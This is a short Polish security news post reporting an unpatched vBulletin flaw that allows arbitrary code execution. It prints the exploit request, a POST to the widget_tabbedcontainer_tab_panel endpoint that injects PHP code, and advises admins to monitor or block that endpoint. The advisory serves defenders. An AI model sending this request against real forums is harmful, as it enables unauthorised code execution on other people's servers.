Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
0-day na vBulletin, możliwość wykonania dowolnego kodu
Dwa dni temu, Amir Etemadieh opublikował na swoim blogu posta, w którym opisuje błąd w systemie forum vBulletin.
Exploitacja możliwa jest przez wykonanie prostego zapytania:
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 Host: nazwa_hosta.pl subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
Podatność została zauważona dzięki analizie wcześniejszej podatności w tym samym silniku, oznaczonej symbolem CVE-2019-16759 (na Sekuraku też o niej wspominaliśmy).
Jak na razie producent nie wydał łatki, więc jeśli macie w swojej infrastrukturze vBulletin to warto dokładnie go monitorować, ew. zablokować dostęp do widget_tabbedcontainer_tab_panel
.
— mb